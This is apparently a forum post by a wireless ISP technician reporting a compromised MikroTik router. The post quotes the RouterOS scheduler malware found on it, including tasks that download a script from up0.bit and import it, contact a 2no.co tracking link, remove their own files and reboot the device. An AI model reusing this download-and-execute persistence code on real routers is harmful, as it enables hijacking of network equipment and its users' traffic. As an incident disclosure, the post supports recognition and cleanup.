Today I connect to a WISP client equipment and found this scripts in a routerboard:
The user accounts was changed with comment "A mih by prosto vydalyty" and two IP address class was added: 87.246.0.0/16 and 152.237.0.0/16.
Code: Select all
/system scheduler
add disabled=yes name=upd112 on-event=":delay 1m\r\
\n:do {/tool fetch url=\"https://2no.co/184M37\" mode=http keep-result=no} o\
n-error={}\r\
\n/system scheduler remove [find name=sh113]\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
add disabled=yes interval=12h name=upd113 on-event=":do {/tool fetch url=\"http:\
//up0.bit:31415/error\?part=9\" mode=http dst-path=webproxy/error.html} on-e\
rror={}\r\
\n:do {/tool fetch url=\"http://up0.bit:31415/error\?part=9\" mode=http dst-\
path=flash/webproxy/error.html} on-error={}\r\
\n:do {/tool fetch url=\"http://up0.bit:31415/rsc\?key=9MLcyZzstYRjAa&part=9\
\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/tool fetch url=https://2no.co/184M37 mode=http keep-result=no} on-er\
ror={}\r\
\n/import u113.rsc\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
sep/22/2018 start-time=08:06:13
add disabled=yes interval=1d name=Auto113 on-event=\
"/system scheduler remove [find name=upd111]\r\
\n/system reboot" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
sep/22/2018 start-time=03:11:00